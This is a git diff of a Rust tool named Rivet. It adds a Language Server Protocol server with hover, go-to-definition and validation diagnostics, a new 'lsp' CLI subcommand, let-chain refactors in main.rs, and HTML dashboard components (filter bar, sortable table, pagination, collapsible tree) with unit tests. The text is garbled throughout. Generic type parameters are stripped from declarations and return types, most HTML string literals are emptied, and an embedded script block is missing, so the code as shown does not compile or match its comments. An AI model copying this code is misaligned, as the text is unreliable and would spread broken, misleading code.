self.client + .log_message( + MessageType::WARNING, + "No rivet.yaml found; skipping validation.", + ) + .await; + return; + } + }; + + let config_path = project_root.join("rivet.yaml"); + let config = match rivet_core::load_project_config(&config_path) { + Ok(c) => c, + Err(e) => { + self.client + .log_message( + MessageType::ERROR, + format!("Failed to load rivet.yaml: {e}"), + ) + .await; + return; + } + }; + + let schemas_dir = project_root.join("schemas"); + let schema = match rivet_core::load_schemas(&config.project.schemas, &schemas_dir) { + Ok(s) => s, + Err(e) => { + self.client + .log_message(MessageType::ERROR, format!("Failed to load schemas: {e}")) + .await; + return; + } + }; + + let mut store = Store::new(); + let mut locations: HashMap = HashMap::new(); + + for source in &config.sources { + let path = project_root.join(&source.path); + + // Scan YAML files for artifact locations before loading. + let yaml_paths: Vec = if path.is_dir() { + std::fs::read_dir(&path) + .ok() + .map(|rd| { + rd.filter_map(|e| e.ok()) + .map(|e| e.path()) + .filter(|p| { + p.extension() + .is_some_and(|ext| ext == "yaml" || ext == "yml") + }) + .collect() + }) + .unwrap_or_default() + } else if path.exists() { + vec![path.clone()] + } else { + vec![] + }; + + for yaml_path in &yaml_paths { + if let Ok(content) = std::fs::read_to_string(yaml_path) { + locations.extend(scan_artifact_locations(yaml_path, &content)); + } + } + + match rivet_core::load_artifacts(source, &project_root) { + Ok(artifacts) => { + for artifact in artifacts { + store.upsert(artifact); + } + } + Err(e) => { + self.client + .log_message( + MessageType::ERROR, + format!("Failed to load source '{}': {e}", source.path), + ) + .await; + } + } + } + + let graph = LinkGraph::build(&store, &schema); + + // Load documents. + let mut doc_store = DocumentStore::new(); + for docs_path in &config.docs { + let dir = project_root.join(docs_path); + if let Ok(docs) = rivet_core::document::load_documents(&dir) { + for doc in docs { + doc_store.insert(doc); + } + } + } + + // Run validation. + let mut diagnostics = validate::validate(&store, &schema, &graph); + diagnostics.extend(validate::validate_documents(&doc_store, &store)); + + // Group diagnostics by file. + let mut by_file: HashMap> = HashMap::new(); + + for diag in &diagnostics { + let lsp_diag = to_lsp_diagnostic(diag, &locations); + let uri = diag + .artifact_id + .as_ref() + .and_then(|id| locations.get(id)) + .and_then(|(path, _)| Url::from_file_path(path).ok()) + .unwrap_or_else(|| trigger_uri.clone()); + + by_file.entry(uri).or_default().push(lsp_diag); + } + + // Clear diagnostics on files that are now clean. + // We always publish at least the trigger URI to clear stale diagnostics. + by_file.entry(trigger_uri).or_default(); + + for (uri, diags) in &by_file { + self.client + .publish_diagnostics(uri.clone(), diags.clone(), None) + .await; + } + + // Store the snapshot. + *self.snapshot.lock().unwrap() = Some(Snapshot { + store, + schema, + graph, + doc_store, + locations, + }); + } +} + +#[tower_lsp::async_trait] +impl LanguageServer for RivetLsp { + async fn initialize(&self, params: InitializeParams) -> Result { + // Try to pick up the workspace root. + if let Some(root_uri) = params.root_uri.as_ref().and_then(|u| u.to_file_path().ok()) { + let mut root = self.project_root.lock().unwrap(); + if root.is_none() && root_uri.join("rivet.yaml").exists() { + *root = Some(root_uri); + } + } + + Ok(InitializeResult { + capabilities: ServerCapabilities { + text_document_sync: Some(TextDocumentSyncCapability::Options( + TextDocumentSyncOptions { + open_close: Some(true), + change: Some(TextDocumentSyncKind::FULL), + save: Some(TextDocumentSyncSaveOptions::SaveOptions(SaveOptions { + include_text: Some(true), + })), + ..Default::default() + }, + )), + hover_provider: Some(HoverProviderCapability::Simple(true)), + definition_provider: Some(OneOf::Left(true)), + ..Default::default() + }, + ..Default::default() + }) + } + + async fn initialized(&self, _: InitializedParams) { + self.client + .log_message(MessageType::INFO, "Rivet LSP initialized") + .await; + } + + async fn shutdown(&self) -> Result<()> { + Ok(()) + } + + async fn did_open(&self, params: DidOpenTextDocumentParams) { + let uri = params.text_document.uri.clone(); + self.documents + .lock() + .unwrap() + .insert(uri.clone(), params.text_document.text); + self.rebuild_and_publish(uri).await; + } + + async fn did_change(&self, params: DidChangeTextDocumentParams) { + if let Some(change) = params.content_changes.into_iter().last() { + self.documents + .lock() + .unwrap() + .insert(params.text_document.uri, change.text); + } + } + + async fn did_save(&self, params: DidSaveTextDocumentParams) { + let uri = params.text_document.uri.clone(); + if let Some(text) = params.text { + self.documents.lock().unwrap().insert(uri.clone(), text); + } + self.rebuild_and_publish(uri).await; + } + + async fn hover(&self, params: HoverParams) -> Result> { + let uri = params + .text_document_position_params + .text_document + .uri + .clone(); + let pos = params.text_document_position_params.position; + + let text = { + let docs = self.documents.lock().unwrap(); + docs.get(&uri).cloned() + }; + + let text = match text { + Some(t) => t, + None => return Ok(None), + }; + + // Try [[ID]] first, then YAML id:/target: line. + let artifact_id = artifact_id_at_position(&text, pos.line, pos.character) + .or_else(|| yaml_artifact_id_at_position(&text, pos.line)); + + let artifact_id = match artifact_id { + Some(id) => id, + None => return Ok(None), + }; + + let snapshot = self.snapshot.lock().unwrap(); + let snapshot = match snapshot.as_ref() { + Some(s) => s, + None => return Ok(None), + }; + + let artifact = match snapshot.store.get(&artifact_id) { + Some(a) => a, + None => return Ok(None), + }; + + let md = hover_markdown(artifact); + + Ok(Some(Hover { + contents: HoverContents::Markup(MarkupContent { + kind: MarkupKind::Markdown, + value: md, + }), + range: None, + })) + } + + async fn goto_definition( + &self, + params: GotoDefinitionParams, + ) -> Result> { + let uri = params + .text_document_position_params + .text_document + .uri + .clone(); + let pos = params.text_document_position_params.position; + + let text = { + let docs = self.documents.lock().unwrap(); + docs.get(&uri).cloned() + }; + + let text = match text { + Some(t) => t, + None => return Ok(None), + }; + + let artifact_id = artifact_id_at_position(&text, pos.line, pos.character) + .or_else(|| yaml_artifact_id_at_position(&text, pos.line)); + + let artifact_id = match artifact_id { + Some(id) => id, + None => return Ok(None), + }; + + let snapshot = self.snapshot.lock().unwrap(); + let snapshot = match snapshot.as_ref() { + Some(s) => s, + None => return Ok(None), + }; + + let (path, line) = match snapshot.locations.get(&artifact_id) { + Some(loc) => loc, + None => return Ok(None), + }; + + let target_uri = match Url::from_file_path(path) { + Ok(u) => u, + Err(()) => return Ok(None), + }; + + Ok(Some(GotoDefinitionResponse::Scalar(Location { + uri: target_uri, + range: Range { + start: Position::new(*line, 0), + end: Position::new(*line, 999), + }, + }))) + } +} + +// --------------------------------------------------------------------------- +// Entry point — called from `rivet lsp` +// --------------------------------------------------------------------------- + +pub async fn run_lsp() { + let stdin = tokio::io::stdin(); + let stdout = tokio::io::stdout(); + + let (service, socket) = LspService::new(RivetLsp::new); + Server::new(stdin, stdout, socket).serve(service).await; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + // -- artifact_id_at_position ------------------------------------------- + + #[test] + fn extract_id_inside_brackets() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 8), Some("REQ-001".into())); + } + + #[test] + fn extract_id_at_opening_bracket() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 6), Some("REQ-001".into())); + } + + #[test] + fn extract_id_at_closing_bracket() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 14), Some("REQ-001".into())); + } + + #[test] + fn no_id_outside_brackets() { + let text = "See [[REQ-001]] for details."; + assert_eq!(artifact_id_at_position(text, 0, 0), None); + assert_eq!(artifact_id_at_position(text, 0, 20), None); + } + + #[test] + fn multiline_extraction() { + let text = "first line\n[[H-002]] second line\nthird"; + assert_eq!(artifact_id_at_position(text, 1, 4), Some("H-002".into())); + } + + #[test] + fn empty_brackets_return_none() { + let text = "[[]] nothing"; + assert_eq!(artifact_id_at_position(text, 0, 2), None); + } + + // -- yaml_artifact_id_at_position -------------------------------------- + + #[test] + fn yaml_id_line() { + let text = " - id: REQ-042\n title: Foo"; + assert_eq!( + yaml_artifact_id_at_position(text, 0), + Some("REQ-042".into()) + ); + } + + #[test] + fn yaml_target_line() { + let text = " - target: UCA-003\n"; + assert_eq!( + yaml_artifact_id_at_position(text, 0), + Some("UCA-003".into()) + ); + } + + #[test] + fn yaml_non_id_line() { + let text = " title: Some Title"; + assert_eq!(yaml_artifact_id_at_position(text, 0), None); + } + + // -- scan_artifact_locations ------------------------------------------- + + #[test] + fn scan_locations_from_yaml() { + let content = "\ +artifacts: + - id: REQ-001 + title: First + - id: REQ-002 + title: Second +"; + let locs = scan_artifact_locations(Path::new("/test.yaml"), content); + assert_eq!(locs.len(), 2); + assert_eq!(locs.get("REQ-001"), Some(&(PathBuf::from("/test.yaml"), 1))); + assert_eq!(locs.get("REQ-002"), Some(&(PathBuf::from("/test.yaml"), 3))); + } + + // -- to_lsp_diagnostic ------------------------------------------------- + + #[test] + fn convert_error_diagnostic() { + let mut locations = HashMap::new(); + locations.insert("REQ-001".to_string(), (PathBuf::from("/test.yaml"), 5)); + + let diag = validate::Diagnostic { + severity: Severity::Error, + artifact_id: Some("REQ-001".to_string()), + rule: "known-type".to_string(), + message: "unknown artifact type 'bogus'".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::ERROR)); + assert_eq!(lsp_diag.source, Some("rivet".into())); + assert_eq!(lsp_diag.range.start.line, 5); + assert_eq!(lsp_diag.message, "unknown artifact type 'bogus'"); + assert_eq!( + lsp_diag.code, + Some(NumberOrString::String("known-type".into())) + ); + } + + #[test] + fn convert_warning_diagnostic() { + let locations = HashMap::new(); + + let diag = validate::Diagnostic { + severity: Severity::Warning, + artifact_id: None, + rule: "allowed-values".to_string(), + message: "bad value".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::WARNING)); + // No location known -> default range. + assert_eq!(lsp_diag.range, Range::default()); + } + + #[test] + fn convert_info_diagnostic() { + let locations = HashMap::new(); + + let diag = validate::Diagnostic { + severity: Severity::Info, + artifact_id: None, + rule: "coverage".to_string(), + message: "info message".to_string(), + }; + + let lsp_diag = to_lsp_diagnostic(&diag, &locations); + assert_eq!(lsp_diag.severity, Some(DiagnosticSeverity::INFORMATION)); + } + + // -- initialize capabilities ------------------------------------------ + + #[test] + fn initialize_returns_correct_capabilities() { + // We verify that the ServerCapabilities struct we build is correct + // by constructing it the same way the LSP handler does. + let capabilities = ServerCapabilities { + text_document_sync: Some(TextDocumentSyncCapability::Options( + TextDocumentSyncOptions { + open_close: Some(true), + change: Some(TextDocumentSyncKind::FULL), + save: Some(TextDocumentSyncSaveOptions::SaveOptions(SaveOptions { + include_text: Some(true), + })), + ..Default::default() + }, + )), + hover_provider: Some(HoverProviderCapability::Simple(true)), + definition_provider: Some(OneOf::Left(true)), + ..Default::default() + }; + + // text_document_sync + match &capabilities.text_document_sync { + Some(TextDocumentSyncCapability::Options(opts)) => { + assert_eq!(opts.open_close, Some(true)); + assert_eq!(opts.change, Some(TextDocumentSyncKind::FULL)); + assert!(opts.save.is_some()); + } + other => panic!("unexpected text_document_sync: {other:?}"), + } + + // hover + assert_eq!( + capabilities.hover_provider, + Some(HoverProviderCapability::Simple(true)) + ); + + // definition + assert_eq!(capabilities.definition_provider, Some(OneOf::Left(true))); + } + + // -- hover_markdown ---------------------------------------------------- + + #[test] + fn hover_markdown_includes_fields() { + use rivet_core::model::{Artifact, Link}; + use std::collections::BTreeMap; + + let artifact = Artifact { + id: "REQ-001".into(), + artifact_type: "requirement".into(), + title: "First requirement".into(), + description: Some("A detailed description.".into()), + status: Some("approved".into()), + tags: vec![], + links: vec![Link { + link_type: "satisfies".into(), + target: "FEAT-001".into(), + }], + fields: BTreeMap::new(), + source_file: None, + }; + + let md = hover_markdown(&artifact); + assert!(md.contains("### First requirement")); + assert!(md.contains("**Type:** `requirement`")); + assert!(md.contains("**Status:** `approved`")); + assert!(md.contains("A detailed description.")); + assert!(md.contains("`satisfies` -> `FEAT-001`")); + } +} diff --git a/rivet-cli/src/main.rs b/rivet-cli/src/main.rs index a225f10..ab07527 100644 --- a/rivet-cli/src/main.rs +++ b/rivet-cli/src/main.rs @@ -16,6 +16,7 @@ use rivet_core::store::Store; use rivet_core::validate; mod docs; +mod lsp; mod schema_cmd; mod serve; @@ -249,6 +250,9 @@ enum Command { port: u16, }, + /// Start the Language Server Protocol (LSP) server on stdin/stdout + Lsp, + /// Sync external project dependencies into .rivet/repos/ Sync, @@ -440,6 +444,11 @@ fn run(cli: Cli) -> Result { ))?; Ok(true) } + Command::Lsp => { + let rt = tokio::runtime::Runtime::new().context("failed to create tokio runtime")?; + rt.block_on(lsp::run_lsp()); + Ok(true) + } Command::Sync => cmd_sync(&cli), Command::Lock { update } => cmd_lock(&cli, *update), Command::Baseline { action } => match action { @@ -885,54 +894,54 @@ fn cmd_validate(cli: &Cli, format: &str) -> Result { let mut backlinks: Vec = Vec::new(); let mut circular_deps: Vec = Vec::new(); let mut version_conflicts: Vec = Vec::new(); - if let Some(ref externals) = config.externals { - if !externals.is_empty() { - match rivet_core::externals::load_all_externals(externals, &cli.project) { - Ok(resolved) => { - // Build external ID sets - let mut external_ids: std::collections::BTreeMap< - String, - std::collections::HashSet, - > = std::collections::BTreeMap::new(); - for ext in &resolved { - let ids: std::collections::HashSet = - ext.artifacts.iter().map(|a| a.id.clone()).collect(); - external_ids.insert(ext.prefix.clone(), ids); - } + if let Some(ref externals) = config.externals + && !externals.is_empty() + { + match rivet_core::externals::load_all_externals(externals, &cli.project) { + Ok(resolved) => { + // Build external ID sets + let mut external_ids: std::collections::BTreeMap< + String, + std::collections::HashSet, + > = std::collections::BTreeMap::new(); + for ext in &resolved { + let ids: std::collections::HashSet = + ext.artifacts.iter().map(|a| a.id.clone()).collect(); + external_ids.insert(ext.prefix.clone(), ids); + } - // Collect local IDs and all link targets - let local_ids: std::collections::HashSet = - store.iter().map(|a| a.id.clone()).collect(); - let all_refs: Vec<&str> = store - .iter() - .flat_map(|a| a.links.iter().map(|l| l.target.as_str())) - .collect(); + // Collect local IDs and all link targets + let local_ids: std::collections::HashSet = + store.iter().map(|a| a.id.clone()).collect(); + let all_refs: Vec<&str> = store + .iter() + .flat_map(|a| a.links.iter().map(|l| l.target.as_str())) + .collect(); - cross_repo_broken = - rivet_core::externals::validate_refs(&all_refs, &local_ids, &external_ids); + cross_repo_broken = + rivet_core::externals::validate_refs(&all_refs, &local_ids, &external_ids); - // Compute backlinks from external artifacts pointing to local artifacts - backlinks = rivet_core::externals::compute_backlinks(&resolved, &local_ids); - } - Err(e) => { - eprintln!(" warning: could not load externals for cross-repo validation: {e}"); - } + // Compute backlinks from external artifacts pointing to local artifacts + backlinks = rivet_core::externals::compute_backlinks(&resolved, &local_ids); } + Err(e) => { + eprintln!(" warning: could not load externals for cross-repo validation: {e}"); + } + } - // Detect circular dependencies in the externals graph - circular_deps = rivet_core::externals::detect_circular_deps( - externals, - &config.project.name, - &cli.project, - ); + // Detect circular dependencies in the externals graph + circular_deps = rivet_core::externals::detect_circular_deps( + externals, + &config.project.name, + &cli.project, + ); - // Detect version conflicts (same repo at different refs) - version_conflicts = rivet_core::externals::detect_version_conflicts( - externals, - &config.project.name, - &cli.project, - ); - } + // Detect version conflicts (same repo at different refs) + version_conflicts = rivet_core::externals::detect_version_conflicts( + externals, + &config.project.name, + &cli.project, + ); } // Lifecycle completeness check @@ -1861,11 +1870,11 @@ fn cmd_commit_msg_check(cli: &Cli, file: &std::path::Path) -> Result { let subject = message.lines().next().unwrap_or(""); // Check exempt type - if let Some(ct) = rivet_core::commits::parse_commit_type(subject) { - if commits_cfg.exempt_types.iter().any(|et| et == &ct) { - log::debug!("commit type '{ct}' is exempt"); - return Ok(true); - } + if let Some(ct) = rivet_core::commits::parse_commit_type(subject) + && commits_cfg.exempt_types.iter().any(|et| et == &ct) + { + log::debug!("commit type '{ct}' is exempt"); + return Ok(true); } // Check skip trailer @@ -2188,12 +2197,12 @@ fn resolve_schemas_dir(cli: &Cli) -> PathBuf { } // Try relative to the binary location - if let Ok(exe) = std::env::current_exe() { - if let Some(parent) = exe.parent() { - let bin_schemas = parent.join("../schemas"); - if bin_schemas.exists() { - return bin_schemas; - } + if let Ok(exe) = std::env::current_exe() + && let Some(parent) = exe.parent() + { + let bin_schemas = parent.join("../schemas"); + if bin_schemas.exists() { + return bin_schemas; } } @@ -2236,17 +2245,16 @@ fn cmd_sync(cli: &Cli) -> Result { if let Some(ext) = externals.get(name) { let ext_dir = rivet_core::externals::resolve_external_dir(ext, &cache_dir, &cli.project); - if ext_dir.join(".git").exists() { - if let Ok(current) = rivet_core::externals::git_head_sha(&ext_dir) { - if current != entry.commit { - eprintln!( - " Warning: {} is at {} but lockfile pins {}", - name, - ¤t[..8.min(current.len())], - &entry.commit[..8.min(entry.commit.len())] - ); - } - } + if ext_dir.join(".git").exists() + && let Ok(current) = rivet_core::externals::git_head_sha(&ext_dir) + && current != entry.commit + { + eprintln!( + " Warning: {} is at {} but lockfile pins {}", + name, + ¤t[..8.min(current.len())], + &entry.commit[..8.min(entry.commit.len())] + ); } } } diff --git a/rivet-cli/src/serve/components.rs b/rivet-cli/src/serve/components.rs new file mode 100644 index 0000000..65b6933 --- /dev/null +++ b/rivet-cli/src/serve/components.rs @@ -0,0 +1,716 @@ +//! Reusable HTML UI components for the Rivet dashboard. +//! +//! Each component renders an HTML fragment as a `String`. All components +//! encode their state in URL query parameters so the view survives page +//! reload and browser back/forward. + +// Components are built ahead of view integration — suppress dead code +// warnings until views are migrated to use them. + +use super::html_escape; + +// ── ViewParams ────────────────────────────────────────────────────────── + +/// Common query parameters shared across dashboard views. +/// +/// Views deserialise this from the request URL. Components use it to +/// render controls whose state matches the URL and to generate links +/// that preserve existing params when changing one value. +#[derive(Debug, Clone, serde::Deserialize, Default)] +pub struct ViewParams { + /// Comma-separated artifact type filter. + #[serde(default)] + pub types: Option, + /// Status filter (e.g. "approved", "draft"). + #[serde(default)] + pub status: Option, + /// Comma-separated tag filter. + #[serde(default)] + pub tags: Option, + /// Free-text search query. + #[serde(default)] + pub q: Option, + /// Sort column name. + #[serde(default)] + pub sort: Option, + /// Sort direction: "asc" or "desc". + #[serde(default)] + pub dir: Option, + /// 1-based page number. + #[serde(default)] + pub page: Option, + /// Items per page. + #[serde(default)] + pub per_page: Option, + /// Comma-separated IDs of open tree nodes. + #[serde(default)] + pub open: Option, + /// Print mode: strips nav/chrome when true. + #[serde(default)] + pub print: Option, +} + +impl ViewParams { + /// Build a query string, merging `overrides` on top of current values. + /// Pass `("key", "")` to remove a parameter. + pub fn to_query_string(&self, overrides: &[(&str, &str)]) -> String { + let mut params: Vec<(String, String)> = Vec::new(); + + // Collect current params + macro_rules! push_opt { + ($field:ident) => { + if let Some(ref v) = self.$field { + if !v.is_empty() { + params.push((stringify!($field).to_string(), v.clone())); + } + } + }; + } + push_opt!(types); + push_opt!(status); + push_opt!(tags); + push_opt!(q); + push_opt!(sort); + push_opt!(dir); + push_opt!(open); + + if let Some(p) = self.page { + params.push(("page".into(), p.to_string())); + } + if let Some(pp) = self.per_page { + params.push(("per_page".into(), pp.to_string())); + } + if self.print == Some(true) { + params.push(("print".into(), "1".into())); + } + + // Apply overrides + for &(key, val) in overrides { + params.retain(|(k, _)| k != key); + if !val.is_empty() { + params.push((key.to_string(), val.to_string())); + } + } + + if params.is_empty() { + String::new() + } else { + let qs: Vec = params + .iter() + .map(|(k, v)| format!("{}={}", urlencoding::encode(k), urlencoding::encode(v))) + .collect(); + format!("?{}", qs.join("&")) + } + } + + /// Parse the `types` field into a vec of individual type strings. + pub fn type_list(&self) -> Vec { + self.types + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Parse the `tags` field into a vec of individual tag strings. + pub fn tag_list(&self) -> Vec { + self.tags + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Parse the `open` field into a vec of node IDs. + pub fn open_list(&self) -> Vec { + self.open + .as_deref() + .filter(|s| !s.is_empty()) + .map(|s| s.split(',').map(|t| t.trim().to_string()).collect()) + .unwrap_or_default() + } + + /// Current page (1-based, defaults to 1). + pub fn current_page(&self) -> usize { + self.page.unwrap_or(1).max(1) + } + + /// Items per page (defaults to 50). + pub fn items_per_page(&self) -> usize { + self.per_page.unwrap_or(50).clamp(10, 500) + } + + /// Sort direction: true = ascending. + pub fn sort_ascending(&self) -> bool { + self.dir.as_deref() != Some("desc") + } +} + +// ── FilterBar ─────────────────────────────────────────────────────────── + +/// Configuration for a filter bar component. +pub struct FilterBarConfig<'a> { + /// Route path (e.g., "/artifacts", "/stpa"). + pub base_url: &'a str, + /// All available artifact types for checkboxes. + pub available_types: &'a [String], + /// All available status values for dropdown. + pub available_statuses: &'a [String], + /// Current view parameters (determines checked/selected state). + pub params: &'a ViewParams, +} + +/// Render a horizontal filter bar with type checkboxes, status dropdown, +/// and text search. All changes trigger HTMX GET to preserve URL state. +pub fn filter_bar(cfg: &FilterBarConfig) -> String { + let active_types = cfg.params.type_list(); + let active_status = cfg.params.status.as_deref().unwrap_or(""); + let search_text = cfg.params.q.as_deref().unwrap_or(""); + + let mut html = String::with_capacity(2048); + html.push_str( + "
", + ); + + // Wrap in a form-like container — JS updates URL on change + html.push_str(&format!( + "
", + html_escape(cfg.base_url) + )); + + // Type checkboxes + if !cfg.available_types.is_empty() { + html.push_str("
"); + html.push_str( + "Type:", + ); + for t in cfg.available_types { + let checked = if active_types.contains(t) { + " checked" + } else { + "" + }; + html.push_str(&format!( + "", + html_escape(t), + checked, + html_escape(t) + )); + } + html.push_str("
"); + } + + // Status dropdown + if !cfg.available_statuses.is_empty() { + html.push_str("
"); + html.push_str("Status:"); + html.push_str(""); + html.push_str("
"); + } + + // Text search + html.push_str( + "
", + ); + html.push_str("Search:"); + html.push_str(&format!( + "", + html_escape(search_text), + html_escape(cfg.base_url), + )); + html.push_str("
"); + + // Clear button + html.push_str(&format!( + "Clear", + html_escape(cfg.base_url), + html_escape(cfg.base_url), + )); + + html.push_str("
"); // filter-controls + html.push_str("
"); // filter-bar + + // JS to wire up checkboxes and dropdown → URL param updates + html.push_str(&format!( + r#""#, + cfg.base_url, + )); + + html +} + +// ── SortableTable ─────────────────────────────────────────────────────── + +/// Sort direction. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum SortDir { + Asc, + Desc, +} + +/// Column definition for a sortable table. +pub struct Column { + /// Internal key used in `?sort=` param. + pub key: String, + /// Display header text. + pub label: String, + /// Whether this column is sortable. + pub sortable: bool, +} + +/// Configuration for a sortable table. +pub struct TableConfig<'a> { + pub base_url: &'a str, + pub columns: &'a [Column], + /// Each row is a vec of HTML cell contents. + pub rows: &'a [Vec], + pub params: &'a ViewParams, +} + +/// Render a sortable HTML table with clickable column headers. +pub fn sortable_table(cfg: &TableConfig) -> String { + let current_sort = cfg.params.sort.as_deref().unwrap_or(""); + let current_dir = if cfg.params.sort_ascending() { + SortDir::Asc + } else { + SortDir::Desc + }; + + let mut html = String::with_capacity(4096); + html.push_str(""); + + for col in cfg.columns.iter() { + if col.sortable { + let (new_dir, arrow) = if col.key == current_sort { + match current_dir { + SortDir::Asc => ("desc", " ↑"), + SortDir::Desc => ("asc", " ↓"), + } + } else { + ("asc", "") + }; + let qs = + cfg.params + .to_query_string(&[("sort", &col.key), ("dir", new_dir), ("page", "1")]); + html.push_str(&format!( + "", + html_escape(cfg.base_url), + qs, + html_escape(&col.label), + arrow, + )); + } else { + html.push_str(&format!("", html_escape(&col.label))); + } + } + + html.push_str(""); + + for row in cfg.rows.iter() { + html.push_str(""); + for cell in row { + html.push_str(&format!("")); + } + html.push_str(""); + } + + html.push_str("
{}{}{}
{cell}
"); + html +} + +// ── Pagination ────────────────────────────────────────────────────────── + +/// Render pagination controls: « ‹ page N of M › » +pub fn pagination(total_items: usize, params: &ViewParams, base_url: &str) -> String { + let per_page = params.items_per_page(); + let total_pages = total_items.div_ceil(per_page); + let current = params.current_page().min(total_pages).max(1); + + if total_pages <= 1 { + return format!( + "
\ + {} items
", + total_items + ); + } + + let mut html = String::with_capacity(512); + html.push_str( + "
", + ); + + // Helper to make a page link + let page_link = |page: usize, label: &str, enabled: bool| -> String { + if enabled { + let qs = params.to_query_string(&[("page", &page.to_string())]); + format!( + "{label}" + ) + } else { + format!( + "{label}" + ) + } + }; + + html.push_str(&page_link(1, "«", current > 1)); + html.push_str(&page_link( + current.saturating_sub(1).max(1), + "‹", + current > 1, + )); + html.push_str(&format!( + "page {current} of {total_pages}" + )); + html.push_str(&page_link( + (current + 1).min(total_pages), + "›", + current < total_pages, + )); + html.push_str(&page_link(total_pages, "»", current < total_pages)); + html.push_str(&format!( + "({total_items} items)" + )); + + html.push_str("
"); + html +} + +// ── CollapsibleTree ───────────────────────────────────────────────────── + +/// A node in a collapsible tree. +pub struct TreeNode { + /// Unique ID (used in `?open=` param). + pub id: String, + /// HTML content for the summary line. + pub summary_html: String, + /// HTML content shown when expanded. + pub detail_html: String, + /// Child nodes. + pub children: Vec, +} + +/// Render a hierarchical tree with `
/` elements. +/// The `open_ids` set determines which nodes start expanded. +/// Provides "Expand All" / "Collapse All" buttons. +pub fn collapsible_tree( + nodes: &[TreeNode], + open_ids: &[String], + base_url: &str, + params: &ViewParams, +) -> String { + let mut html = String::with_capacity(4096); + + // Expand/Collapse all buttons + let all_ids: Vec<&str> = collect_all_ids(nodes); + let expand_qs = params.to_query_string(&[("open", &all_ids.join(","))]); + let collapse_qs = params.to_query_string(&[("open", "")]); + + html.push_str(&format!( + "" + )); + + render_tree_nodes(&mut html, nodes, open_ids, 0); + html +} + +fn collect_all_ids(nodes: &[TreeNode]) -> Vec<&str> { + let mut ids = Vec::new(); + for node in nodes { + ids.push(node.id.as_str()); + ids.extend(collect_all_ids(&node.children)); + } + ids +} + +fn render_tree_nodes(html: &mut String, nodes: &[TreeNode], open_ids: &[String], depth: usize) { + let indent = depth * 16; + for node in nodes { + let is_open = open_ids.iter().any(|id| id == &node.id); + let open_attr = if is_open { " open" } else { "" }; + + html.push_str(&format!( + "" + )); + html.push_str(&format!( + "{}", + node.summary_html + )); + html.push_str(&format!( + "
{}
", + node.detail_html + )); + + if !node.children.is_empty() { + render_tree_nodes(html, &node.children, open_ids, depth + 1); + } + + html.push_str("
"); + } +} + +// ── Paginate helper ───────────────────────────────────────────────────── + +/// Apply pagination to a slice: returns the page slice and total count. +#[allow(clippy::needless_lifetimes)] +pub fn paginate<'a, T>(items: &'a [T], params: &ViewParams) -> (&'a [T], usize) { + let total = items.len(); + let per_page = params.items_per_page(); + let page = params.current_page(); + let start = (page - 1) * per_page; + if start >= total { + (&[], total) + } else { + let end = (start + per_page).min(total); + (&items[start..end], total) + } +} + +// ── Tests ─────────────────────────────────────────────────────────────── + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn view_params_defaults() { + let p = ViewParams::default(); + assert_eq!(p.current_page(), 1); + assert_eq!(p.items_per_page(), 50); + assert!(p.sort_ascending()); + assert!(p.type_list().is_empty()); + assert!(p.open_list().is_empty()); + } + + #[test] + fn view_params_to_query_string() { + let p = ViewParams { + types: Some("requirement,feature".into()), + sort: Some("id".into()), + dir: Some("desc".into()), + ..Default::default() + }; + let qs = p.to_query_string(&[]); + assert!(qs.contains("types=")); + assert!(qs.contains("sort=id")); + assert!(qs.contains("dir=desc")); + } + + #[test] + fn view_params_override_removes_param() { + let p = ViewParams { + types: Some("requirement".into()), + status: Some("approved".into()), + ..Default::default() + }; + let qs = p.to_query_string(&[("status", "")]); + assert!(!qs.contains("status")); + assert!(qs.contains("types=")); + } + + #[test] + fn view_params_override_replaces_param() { + let p = ViewParams { + page: Some(3), + ..Default::default() + }; + let qs = p.to_query_string(&[("page", "1")]); + assert!(qs.contains("page=1")); + assert!(!qs.contains("page=3")); + } + + #[test] + fn type_list_parsing() { + let p = ViewParams { + types: Some("requirement, feature, hazard".into()), + ..Default::default() + }; + let list = p.type_list(); + assert_eq!(list, vec!["requirement", "feature", "hazard"]); + } + + #[test] + fn pagination_single_page() { + let p = ViewParams::default(); + let html = pagination(30, &p, "/artifacts"); + assert!(html.contains("30 items")); + // Should not have page navigation (single page with 50 per_page) + assert!(!html.contains("page ")); + } + + #[test] + fn pagination_multi_page() { + let p = ViewParams { + page: Some(2), + per_page: Some(10), + ..Default::default() + }; + let html = pagination(35, &p, "/artifacts"); + assert!(html.contains("page 2 of 4")); + assert!(html.contains("35 items")); + } + + #[test] + fn paginate_slice() { + let items: Vec = (0..100).collect(); + let p = ViewParams { + page: Some(3), + per_page: Some(20), + ..Default::default() + }; + let (slice, total) = paginate(&items, &p); + assert_eq!(total, 100); + assert_eq!(slice.len(), 20); + assert_eq!(slice[0], 40); + } + + #[test] + fn paginate_last_page_partial() { + let items: Vec = (0..55).collect(); + let p = ViewParams { + page: Some(3), + per_page: Some(20), + ..Default::default() + }; + let (slice, total) = paginate(&items, &p); + assert_eq!(total, 55); + assert_eq!(slice.len(), 15); // 55 - 40 = 15 + } + + #[test] + fn filter_bar_renders_html() { + let types = vec!["requirement".to_string(), "feature".to_string()]; + let statuses = vec!["draft".to_string(), "approved".to_string()]; + let p = ViewParams { + types: Some("requirement".into()), + ..Default::default() + }; + let html = filter_bar(&FilterBarConfig { + base_url: "/artifacts", + available_types: &types, + available_statuses: &statuses, + params: &p, + }); + assert!(html.contains("filter-bar")); + assert!(html.contains("checked")); // requirement should be checked + assert!(html.contains("feature")); // feature checkbox present + assert!(html.contains("Clear")); // clear button + } + + #[test] + fn sortable_table_renders_headers() { + let cols = vec![ + Column { + key: "id".into(), + label: "ID".into(), + sortable: true, + }, + Column { + key: "title".into(), + label: "Title".into(), + sortable: true, + }, + 